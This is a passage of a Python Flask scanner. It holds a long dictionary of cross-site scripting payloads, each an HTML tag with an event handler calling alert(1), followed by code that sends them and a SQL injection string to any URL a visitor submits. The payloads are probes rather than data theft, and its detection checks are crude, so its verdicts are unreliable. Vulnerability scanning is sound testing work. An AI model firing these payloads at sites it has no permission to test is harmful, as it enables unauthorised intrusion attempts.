    "<big onpaste=\"alert(1)\" contenteditable>test</big>": "<big onpaste=\"alert(1)\" contenteditable>test</big>",
    "<blink draggable=\"true\" ondrag=\"alert(1)\">test</blink>": "<blink draggable=\"true\" ondrag=\"alert(1)\">test</blink>",
    "<blink draggable=\"true\" ondragend=\"alert(1)\">test</blink>": "<blink draggable=\"true\" ondragend=\"alert(1)\">test</blink>",
    "<blink draggable=\"true\" ondragenter=\"alert(1)\">test</blink>": "<blink draggable=\"true\" ondragenter=\"alert(1)\">test</blink>",
    "<blink draggable=\"true\" ondragleave=\"alert(1)\">test</blink>": "<blink draggable=\"true\" ondragleave=\"alert(1)\">test</blink>",
    "<blink draggable=\"true\" ondragstart=\"alert(1)\">test</blink>": "<blink draggable=\"true\" ondragstart=\"alert(1)\">test</blink>",
    "<blink id=x tabindex=1 onactivate=alert(1)></blink>": "<blink id=x tabindex=1 onactivate=alert(1)></blink>",
    "<blink id=x tabindex=1 onbeforeactivate=alert(1)></blink>": "<blink id=x tabindex=1 onbeforeactivate=alert(1)></blink>",
    "<blink id=x tabindex=1 onbeforedeactivate=alert(1)></blink><input autofocus>": "<blink id=x tabindex=1 onbeforedeactivate=alert(1)></blink><input autofocus>",
    "<blink id=x tabindex=1 ondeactivate=alert(1)></blink><input id=y autofocus>": "<blink id=x tabindex=1 ondeactivate=alert(1)></blink><input id=y autofocus>",
    "<blink id=x tabindex=1 onfocus=alert(1)></blink>": "<blink id=x tabindex=1 onfocus=alert(1)></blink>",
    "<blink id=x tabindex=1 onfocusin=alert(1)></blink>": "<blink id=x tabindex=1 onfocusin=alert(1)></blink>",
    "<blink onbeforecopy=\"alert(1)\" contenteditable>test</blink>": "<blink onbeforecopy=\"alert(1)\" contenteditable>test</blink>",
    "<blink onbeforecut=\"alert(1)\" contenteditable>test</blink>": "<blink onbeforecut=\"alert(1)\" contenteditable>test</blink>",
    "<blink onbeforepaste=\"alert(1)\" contenteditable>test</blink>": "<blink onbeforepaste=\"alert(1)\" contenteditable>test</blink>",
    "<blink onblur=alert(1) tabindex=1 id=x></blink><input autofocus>": "<blink onblur=alert(1) tabindex=1 id=x></blink><input autofocus>",
    "<blink onclick=\"alert(1)\">test</blink>": "<blink onclick=\"alert(1)\">test</blink>",
    "<blink oncontextmenu=\"alert(1)\">test</blink>": "<blink oncontextmenu=\"alert(1)\">test</blink>",
    "<blink oncopy=\"alert(1)\" contenteditable>test</blink>": "<blink oncopy=\"alert(1)\" contenteditable>test</blink>",
    "<blink oncut=\"alert(1)\" contenteditable>test</blink>": "<blink oncut=\"alert(1)\" contenteditable>test</blink>",
    "<blink ondblclick=\"alert(1)\">test</blink>": "<blink ondblclick=\"alert(1)\">test</blink>",
    "<blink onfocusout=alert(1) tabindex=1 id=x></blink><input autofocus>": "<blink onfocusout=alert(1) tabindex=1 id=x></blink><input autofocus>",
    "<blink onkeydown=\"alert(1)\" contenteditable>test</blink>": "<blink onkeydown=\"alert(1)\" contenteditable>test</blink>",
    "<blink onkeypress=\"alert(1)\" contenteditable>test</blink>": "<blink onkeypress=\"alert(1)\" contenteditable>test</blink>",
    "<blink onkeyup=\"alert(1)\" contenteditable>test</blink>": "<blink onkeyup=\"alert(1)\" contenteditable>test</blink>",
    "<blink onmousedown=\"alert(1)\">test</blink>": "<blink onmousedown=\"alert(1)\">test</blink>",
    "<blink onmouseenter=\"alert(1)\">test</blink>": "<blink onmouseenter=\"alert(1)\">test</blink>",
    "<blink onmouseleave=\"alert(1)\">test</blink>": "<blink onmouseleave=\"alert(1)\">test</blink>",
    "<blink onmousemove=\"alert(1)\">test</blink>": "<blink onmousemove=\"alert(1)\">test</blink>",
    "<blink onmouseout=\"alert(1)\">test</blink>": "<blink onmouseout=\"alert(1)\">test</blink>",
    "<blink onmouseover=\"alert(1)\">test</blink>": "<blink onmouseover=\"alert(1)\">test</blink>",
    "<blink onmouseup=\"alert(1)\">test</blink>": "<blink onmouseup=\"alert(1)\">test</blink>",
    "<blink onpaste=\"alert(1)\" contenteditable>test</blink>": "<blink onpaste=\"alert(1)\" contenteditable>test</blink>",
    "<blockquote draggable=\"true\" ondrag=\"alert(1)\">test</blockquote>": "<blockquote draggable=\"true\" ondrag=\"alert(1)\">test</blockquote>",
    "<blockquote draggable=\"true\" ondragend=\"alert(1)\">test</blockquote>": "<blockquote draggable=\"true\" ondragend=\"alert(1)\">test</blockquote>",
    "<blockquote draggable=\"true\" ondragenter=\"alert(1)\">test</blockquote>": "<blockquote draggable=\"true\" ondragenter=\"alert(1)\">test</blockquote>",
    "<blockquote draggable=\"true\" ondragleave=\"alert(1)\">test</blockquote>": "<blockquote draggable=\"true\" ondragleave=\"alert(1)\">test</blockquote>",
    "<blockquote draggable=\"true\" ondragstart=\"alert(1)\">test</blockquote>": "<blockquote draggable=\"true\" ondragstart=\"alert(1)\">test</blockquote>",
    "<blockquote id=x tabindex=1 onactivate=alert(1)></blockquote>": "<blockquote id=x tabindex=1 onactivate=alert(1)></blockquote>",
    "<blockquote id=x tabindex=1 onbeforeactivate=alert(1)></blockquote>": "<blockquote id=x tabindex=1 onbeforeactivate=alert(1)></blockquote>",
    "<blockquote id=x tabindex=1 onbeforedeactivate=alert(1)></blockquote><input autofocus>": "<blockquote id=x tabindex=1 onbeforedeactivate=alert(1)></blockquote><input autofocus>",
    "<blockquote id=x tabindex=1 ondeactivate=alert(1)></blockquote><input id=y autofocus>": "<blockquote id=x tabindex=1 ondeactivate=alert(1)></blockquote><input id=y autofocus>",
    "<blockquote id=x tabindex=1 onfocus=alert(1)></blockquote>": "<blockquote id=x tabindex=1 onfocus=alert(1)></blockquote>",
    "<blockquote id=x tabindex=1 onfocusin=alert(1)></blockquote>": "<blockquote id=x tabindex=1 onfocusin=alert(1)></blockquote>",
    "<blockquote onbeforecopy=\"alert(1)\" contenteditable>test</blockquote>": "<blockquote onbeforecopy=\"alert(1)\" contenteditable>test</blockquote>",
    "<blockquote onbeforecut=\"alert(1)\" contenteditable>test</blockquote>": "<blockquote onbeforecut=\"alert(1)\" contenteditable>test</blockquote>",
    "<blockquote onbeforepaste=\"alert(1)\" contenteditable>test</blockquote>": "<blockquote onbeforepaste=\"alert(1)\" contenteditable>test</blockquote>",
    "<blockquote onblur=alert(1) tabindex=1 id=x></blockquote><input autofocus>": "<blockquote onblur=alert(1) tabindex=1 id=x></blockquote><input autofocus>",
    "<blockquote onclick=\"alert(1)\">test</blockquote>": "<blockquote onclick=\"alert(1)\">test</blockquote>",
    "<blockquote oncontextmenu=\"alert(1)\">test</blockquote>": "<blockquote oncontextmenu=\"alert(1)\">test</blockquote>",
    "<blockquote oncopy=\"alert(1)\" contenteditable>test</blockquote>": "<blockquote oncopy=\"alert(1)\" contenteditable>test</blockquote>",
    "<blockquote oncut=\"alert(1)\" contenteditable>test</blockquote>": "<blockquote oncut=\"alert(1)\" contenteditable>test</blockquote>",
    "<blockquote ondblclick=\"alert(1)\">test</blockquote>": "<blockquote ondblclick=\"alert(1)\">test</blockquote>",
    "<blockquote onfocusout=alert(1) tabindex=1 id=x></blockquote><input autofocus>": "<blockquote onfocusout=alert(1) tabindex=1 id=x></blockquote><input autofocus>",
    "<blockquote onkeydown=\"alert(1)\" contenteditable>test</blockquote>": "<blockquote onkeydown=\"alert(1)\" contenteditable>test</blockquote>",
    "<blockquote onkeypress=\"alert(1)\" contenteditable>test</blockquote>": "<blockquote onkeypress=\"alert(1)\" contenteditable>test</blockquote>",
    "<blockquote onkeyup=\"alert(1)\" contenteditable>test</blockquote>": "<blockquote onkeyup=\"alert(1)\" contenteditable>test</blockquote>",
    "<blockquote onmousedown=\"alert(1)\">test</blockquote>": "<blockquote onmousedown=\"alert(1)\">test</blockquote>",
    "<blockquote onmouseenter=\"alert(1)\">test</blockquote>": "<blockquote onmouseenter=\"alert(1)\">test</blockquote>",
    "<blockquote onmouseleave=\"alert(1)\">test</blockquote>": "<blockquote onmouseleave=\"alert(1)\">test</blockquote>",
    "<blockquote onmousemove=\"alert(1)\">test</blockquote>": "<blockquote onmousemove=\"alert(1)\">test</blockquote>",
    "<blockquote onmouseout=\"alert(1)\">test</blockquote>": "<blockquote onmouseout=\"alert(1)\">test</blockquote>",
    "<blockquote onmouseover=\"alert(1)\">test</blockquote>": "<blockquote onmouseover=\"alert(1)\">test</blockquote>",
    "<blockquote onmouseup=\"alert(1)\">test</blockquote>": "<blockquote onmouseup=\"alert(1)\">test</blockquote>",
    "<blockquote onpaste=\"alert(1)\" contenteditable>test</blockquote>": "<blockquote onpaste=\"alert(1)\" contenteditable>test</blockquote>",
    "<body draggable=\"true\" ondrag=\"alert(1)\">test</body>": "<body draggable=\"true\" ondrag=\"alert(1)\">test</body>",
    "<body draggable=\"true\" ondragend=\"alert(1)\">test</body>": "<body draggable=\"true\" ondragend=\"alert(1)\">test</body>",
    "<body draggable=\"true\" ondragenter=\"alert(1)\">test</body>": "<body draggable=\"true\" ondragenter=\"alert(1)\">test</body>",
    "<body draggable=\"true\" ondragleave=\"alert(1)\">test</body>": "<body draggable=\"true\" ondragleave=\"alert(1)\">test</body>",
    "<body draggable=\"true\" ondragstart=\"alert(1)\">test</body>": "<body draggable=\"true\" ondragstart=\"alert(1)\">test</body>",
    "<body id=x tabindex=1 onactivate=alert(1)></body>": "<body id=x tabindex=1 onactivate=alert(1)></body>",
    "<body id=x tabindex=1 onbeforeactivate=alert(1)></body>": "<body id=x tabindex=1 onbeforeactivate=alert(1)></body>",
    "<body id=x tabindex=1 onbeforedeactivate=alert(1)></body><input autofocus>": "<body id=x tabindex=1 onbeforedeactivate=alert(1)></body><input autofocus>",
    "<body id=x tabindex=1 ondeactivate=alert(1)></body><input id=y autofocus>": "<body id=x tabindex=1 ondeactivate=alert(1)></body><input id=y autofocus>",
    "<body id=x tabindex=1 onfocus=alert(1)></body>": "<body id=x tabindex=1 onfocus=alert(1)></body>",
    "<body id=x tabindex=1 onfocusin=alert(1)></body>": "<body id=x tabindex=1 onfocusin=alert(1)></body>",
    "<body onafterprint=alert(1)>": "<body onafterprint=alert(1)>",
    "<body onbeforecopy=\"alert(1)\" contenteditable>test</body>": "<body onbeforecopy=\"alert(1)\" contenteditable>test</body>",
    "<body onbeforecut=\"alert(1)\" contenteditable>test</body>": "<body onbeforecut=\"alert(1)\" contenteditable>test</body>",
    "<body onbeforepaste=\"alert(1)\" contenteditable>test</body>": "<body onbeforepaste=\"alert(1)\" contenteditable>test</body>",
    "<body onbeforeprint=alert(1)>": "<body onbeforeprint=alert(1)>",
    "<body onbeforeunload=\"location='javascript:alert(1)'\">": "<body onbeforeunload=\"location='javascript:alert(1)'\">",
    "<body onblur=alert(1) id=x><iframe id=x>": "<body onblur=alert(1) id=x><iframe id=x>",
    "<body onclick=\"alert(1)\">test</body>": "<body onclick=\"alert(1)\">test</body>",
    "<body oncontextmenu=\"alert(1)\">test</body>": "<body oncontextmenu=\"alert(1)\">test</body>",
    "<body oncopy=\"alert(1)\" contenteditable>test</body>": "<body oncopy=\"alert(1)\" contenteditable>test</body>",
    "<body oncut=\"alert(1)\" contenteditable>test</body>": "<body oncut=\"alert(1)\" contenteditable>test</body>",
    "<body ondblclick=\"alert(1)\">test</body>": "<body ondblclick=\"alert(1)\">test</body>",
    "<body onerror=alert(1) onload=/": "<body onerror=alert(1) onload=/",
    "<body onfocusout=alert(1) id=x><iframe id=x>": "<body onfocusout=alert(1) id=x><iframe id=x>",
    "<body onhashchange=\"alert(1)\">": "<body onhashchange=\"alert(1)\">",
    "<body onkeydown=\"alert(1)\" contenteditable>test</body>": "<body onkeydown=\"alert(1)\" contenteditable>test</body>",
    "<body onkeypress=\"alert(1)\" contenteditable>test</body>": "<body onkeypress=\"alert(1)\" contenteditable>test</body>",
    "<body onkeyup=\"alert(1)\" contenteditable>test</body>": "<body onkeyup=\"alert(1)\" contenteditable>test</body>",
    "<body onload=alert(1)>": "<body onload=alert(1)>",
    "<body onmessage=alert(1)>": "<body onmessage=alert(1)>",
    "<body onmousedown=\"alert(1)\">test</body>": "<body onmousedown=\"alert(1)\">test</body>",
    "<body onmouseenter=\"alert(1)\">test</body>": "<body onmouseenter=\"alert(1)\">test</body>",
    "<body onmouseleave=\"alert(1)\">test</body>": "<body onmouseleave=\"alert(1)\">test</body>",
    "<body onmousemove=\"alert(1)\">test</body>": "<body onmousemove=\"alert(1)\">test</body>",
    "<body onmouseout=\"alert(1)\">test</body>": "<body onmouseout=\"alert(1)\">test</body>",
    "<body onmouseover=\"alert(1)\">test</body>": "<body onmouseover=\"alert(1)\">test</body>",
    "<body onmouseup=\"alert(1)\">test</body>": "<body onmouseup=\"alert(1)\">test</body>",
    "<body onpageshow=alert(1)>": "<body onpageshow=alert(1)>",
    "<body onpaste=\"alert(1)\" contenteditable>test</body>": "<body onpaste=\"alert(1)\" contenteditable>test</body>",
    "<body onpopstate=alert(1)>": "<body onpopstate=alert(1)>",
    "<body onresize=\"alert(1)\">": "<body onresize=\"alert(1)\">",
    "<body onscroll=alert(1)><div style=height:1000px></div><div id=x></div>": "<body onscroll=alert(1)><div style=height:1000px></div><div id=x></div>",
    "<body onunhandledrejection=alert(1)><script>fetch('//xyz')</script>": "<body onunhandledrejection=alert(1)><script>fetch('//xyz')</script>",
    "<body onwheel=alert(1)>": "<body onwheel=alert(1)>",
    "<br draggable=\"true\" ondrag=\"alert(1)\">test</br>": "<br draggable=\"true\" ondrag=\"alert(1)\">test</br>",
    "<br draggable=\"true\" ondragend=\"alert(1)\">test</br>": "<br draggable=\"true\" ondragend=\"alert(1)\">test</br>",
    "<br draggable=\"true\" ondragenter=\"alert(1)\">test</br>": "<br draggable=\"true\" ondragenter=\"alert(1)\">test</br>",
    "<br draggable=\"true\" ondragleave=\"alert(1)\">test</br>": "<br draggable=\"true\" ondragleave=\"alert(1)\">test</br>",
    "<br draggable=\"true\" ondragstart=\"alert(1)\">test</br>": "<br draggable=\"true\" ondragstart=\"alert(1)\">test</br>",
    "<br id=x tabindex=1 onactivate=alert(1)></br>": "<br id=x tabindex=1 onactivate=alert(1)></br>",
    "<br id=x tabindex=1 onbeforeactivate=alert(1)></br>": "<br id=x tabindex=1 onbeforeactivate=alert(1)></br>",
    "<br id=x tabindex=1 onbeforedeactivate=alert(1)></br><input autofocus>": "<br id=x tabindex=1 onbeforedeactivate=alert(1)></br><input autofocus>",
    "<br id=x tabindex=1 ondeactivate=alert(1)></br><input id=y autofocus>": "<br id=x tabindex=1 ondeactivate=alert(1)></br><input id=y autofocus>",
    "<br id=x tabindex=1 onfocus=alert(1)></br>": "<br id=x tabindex=1 onfocus=alert(1)></br>",
    "<br id=x tabindex=1 onfocusin=alert(1)></br>": "<br id=x tabindex=1 onfocusin=alert(1)></br>",
    "<br onbeforecopy=\"alert(1)\" contenteditable>test</br>": "<br onbeforecopy=\"alert(1)\" contenteditable>test</br>",
    "<br onbeforecut=\"alert(1)\" contenteditable>test</br>": "<br onbeforecut=\"alert(1)\" contenteditable>test</br>",
    "<br onbeforepaste=\"alert(1)\" contenteditable>test</br>": "<br onbeforepaste=\"alert(1)\" contenteditable>test</br>",
    "<br onblur=alert(1) tabindex=1 id=x></br><input autofocus>": "<br onblur=alert(1) tabindex=1 id=x></br><input autofocus>",
    "<br onclick=\"alert(1)\">test</br>": "<br onclick=\"alert(1)\">test</br>",
    "<br oncontextmenu=\"alert(1)\">test</br>": "<br oncontextmenu=\"alert(1)\">test</br>",
    "<br oncopy=\"alert(1)\" contenteditable>test</br>": "<br oncopy=\"alert(1)\" contenteditable>test</br>",
    "<br oncut=\"alert(1)\" contenteditable>test</br>": "<br oncut=\"alert(1)\" contenteditable>test</br>",
    "<br ondblclick=\"alert(1)\">test</br>": "<br ondblclick=\"alert(1)\">test</br>",
    
    
}
app = Flask(__name__)


def check_xss(url):
    for key, xss_test_script in xss_dict.items():
        response = requests.get(url, params={"q": xss_test_script})
        if xss_test_script in response.text:
            return True
    return False

def check_sql_injection(url):
    sql_test_payload = "' OR '1'='1"
    response = requests.get(url, params={"id": sql_test_payload})
    if "sql" in response.text.lower():
        return True
    return False

@app.route("/", methods=["GET", "POST"])
def index():
    if request.method == "POST":
        url = request.form.get("url")
        if not url.startswith(('http://', 'https://')):
            url = 'http://' + url
        xss_vulnerable = check_xss(url)
        sql_injection_vulnerable = check_sql_injection(url)
        return render_template("result.html", url=url, xss=xss_vulnerable, sql=sql_injection_vulnerable)
    return render_template("index.html")

if __name__ == "__main__":
    app.run(debug=True)
